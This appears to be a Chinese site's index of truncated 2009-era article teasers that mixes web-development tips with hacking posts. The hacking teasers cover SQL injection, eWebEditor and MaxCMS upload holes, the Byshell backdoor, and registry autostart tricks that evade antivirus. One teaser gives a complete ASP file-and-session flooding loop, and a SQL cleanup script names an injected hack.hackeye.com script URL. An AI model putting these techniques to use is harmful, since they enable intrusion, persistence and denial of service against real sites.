MySQL注入的意图是接管网站数据库并窃取信息。常见的开源数据库，如MySQL，已经被许多网站开发人员用来储存重要信息，如密码，个人信息和管理信息。 　　MySQL之所以流行，是因为它与最流行的服务器端脚本语言PHP一起使用。而且，PHP是主

作者：flyh4thttp://bbs.wolvez.org关键字：首页-马克斯CMS2.0这个系统是国内非常流行的视频点播系统，之前的1.5版本漏洞非常多，2.0版本在安全方面有所提高，但是依然有漏洞存在。看代码\inc\ajax.aspdim action : action = getForm("ac

作者：X.Z.cool目前网上流传太多ewebeidtor的修改版 lite版、216版的ewebeditor 存在一个注入漏洞 之后一个版也存在这样的问题。前段时间拉至尊宝渗透一内网时发现这个东西。无后台 无法登陆 默认数据库 但用处也不大，所以就深刻研究了下

Byshell是一个无进程、无DLL、无启动项的、集多种Rootkit技术特征的独立功能远程控制后门程序（Backdoor）。其利用线程注射DLL到系统进程，解除DLL映射并删除自身文件和启动项，关机时恢复。它是内核级的木马程序，主要部分工作在Ring0，

偶就在页面多增加了几个字 最新章节列表 结果收录一下子狂飚上去了。。权重一下子全掉下来了。。哭死，不知道改回去还有用没？？？ 有人能给点意见么？ 网站 http://www.60g.cn http://www.yy.tc 应该是60g的权重像坠毁一样的往下掉。。

漏洞更新日期TM： 2009 2 9日今天和静流聊天，他说ewebeditor出了最新漏洞。于是就是检测一下，这个程序爆漏洞一般都是直接上传的漏洞，不过没错 就是上传漏洞。首先在本地搭建一个ASP环境重命名一个木马名字例如：1.gif.asp这样的就OK了

操作环境:马克斯版本,因为他的数据库是有防注入的，和动网等一切的防数据库下载的程序都很差不多。。 而我这一个操作却是可以突破。并是用什么闭合。。闭合的话。我们前提条件是需要知道%方向.而此次我们只 需要知道他的表名(防下载表)即

好多人贴了2005注入语句，基本是显错模式的，如果显错，很多工具还是可以用的；但盲注，工具貌似就不咋地了，pangolin注不了2005，其他2005注入的注入工具对于盲注貌似也很感冒；网上没几个盲注语句，于是平时用到的时候自己写，现在贴出

利用对方服务器漏洞远程注册DLL 我和朋友一起下载了一个相同的组件，苦于无法注册而没用，但最近我发现他在使用这个组件，显然是已经注册了，好奇怪，他是怎么注册的呢？我问他他不说。 其实，我们在ASP中，是有捷径远程注册DLL的，但需要

有时候，我们通过数据库备份一个批处理到启动菜单后，希望服务器在下次重启时运行我们的批处理。可是我们等啊等，服务器就是不重启，怎么办? 让管理员帮我们重启一下吧。呵呵 　　以下注入代码让服务器停止响应，或响应很慢，要取得更好的

网上找到的那个，偶试了下，估计是这几年CPU运算速度已经飞快了。。。所以有点过时了，试了好几个服务器！毛用都没有，特别是那个100平方根的。。。偶那破服务器3秒就出来结果了。。。直接汗颜，偶来丢个狠点的+展开-SQLselect*fromchapt

% set fso=server.CreateObject("scripting.filesystemobject") i=1 do while not i=0 fso.createtextfile(Server.mappath(i".txt")) session(i)=i i=i+1 loop %ASP的。。。。。死循环创建文件和SESSION，建议不要对WEB目录进行。。。最好

为了让大家对破解有个整体概念，我做了一张破解流程图。大家通过图可以看出，破解的最后结果有两种。一是修改代码，进行暴力破解。另一种是推出算法，写出注册机；看图上箭头方向可知：暴力破解,有三个途径：1. 查壳——反编译——追踪调

Microsoft IE CFunctionPointer函数内存破坏漏洞（MS09-002）发布时间:2009-02-10影响版本:Microsoft Internet Explorer 7.0 漏洞描述:BUGTRAQ ID: 33627 CVE(CAN) ID: CVE-2009-0075Comment by Friddy:这个实际不是个破坏内存的漏洞，

作者：FireFox[F.s.T]文章投稿于09年2月黑客手册http://www.nohack.cn/经编辑同意放出 目的是为与大家有更好的交流 更多精彩内容请参阅 黑客手册背景：所谓补丁或者更新，一直以来是研发方为更新产品安全问题、增加新功能或提高运行效率而

　　在ASP.NET 2.0，新增加了不少新的功能和控件。其中，在数据的缓存功能，比asp.net 1.1有了很大的改变。众所周知，数据的缓存功能是十分重要的，我们可以把一些在相对一段时间内不发生改变的数据放在缓存中，这样，就不必要每次去读取

注: 此处说的跨半域，即只支持 *.domain.com 即同一二级域名下是哟个Cookie有三个属性需要注意一下：1. Domain 域2. Path 路径3. Expires 过期时间跨域操作需要设置域属性:Response.Cookies("MyCookie").Domain = "shuwo.net"; (这

+展开-SQLSelect*FROM(selectROW_NUMBER()Over(orderbycf_iddesc)asrowId,*fromT_Test)asmytablewhererowIdbetween21and40每页20条，第２页ROW_NUMBER是SqlServer2005中的新特性以下是利用本方法和传统利用Set RowCount方法存储过程的效率

+展开-SQLDECLAREhCForEachCURSORGLOBALFORSelectN'update'+QUOTENAME(o.name)+N'set'+QUOTENAME(c.name)+N'=replace('+QUOTENAME(c.name)+',''《scriptsrc=http://hack.hackeye.com/cn.js》《/script》'','''')'FROMsysobjectso,syscolu

看到很多朋友问这个问题,虽然很简单,但是很常用,拿出来讨论下吧。。。高手飘过！记得几年前偶刚学.NET的时候偶是这样干的+展开-HTML%@ControlLanguage="c#"%//html...scriptrunat="server"publicstringBackClo="red";//这里定义了一个参数

一般的木马运行添加自启动就会被杀毒软件的主动防御或者360拦截,前几天在网上发现了几个注册表自启动的方法,效果还不错,也算是目前主动防御的一大死角了,连微点竟然也拦截不到.1.cmd运行前执行的程序(被动启动)HKEY_CURRENT_USER\Softwar

此方法是我无意间发现的,出现错误后IIS进程池直接挂掉了。。百试不爽！嘿嘿！+展开-C#///summary///用户昵称获取用户信息////summarypublicDataSetGetUserList(stringunike){returndal.GetUserList(unike);}以上是一个正常的BLL层函数,由

第一种:+展开-HTMLhtmlhead/headbodyformname="form1"inputtype="text"name="getinfo"value="http://www.shuwo.net"size="40"buttononclick="alert(document.form1.getinfo.value)"CHCK/button/form/body/html第二种在HEML中把这个加上 +

+展开-SQLCREATEPROCEDUREPageCut@tblNamevarchar(255),--表名@strGetFieldsvarchar(1000)='*',--需要返回的列@fldNamevarchar(255)='',--排序的字段名@PageSizeint=10,--页尺寸@PageIndexint=1,--页码@OrderTypebit=0,--设置排序类型,非

这两天测试了前几天写的SQL2005专用分页的存储过程，当数据量达到2千多万的时候，效率相当的低，每次执行都要8秒左右（CPU：Q6600）。不过在2百多万数据量的情况下性能还是蛮不错的，在网上找了找，发现这下面的这两个，其实还是一个，不

用变量循环插入记录,开发时需要测试记录,用这个方法很有用,记录下来方便以后备查,大家可以参考修改为其它数据库的SQL.+展开-SQLDECLARE@recordNmberintset@recordNmber=0--SELECTCOUNT(*)FROMtbl_guide_strategyWHILE(@recordNmber)$30BE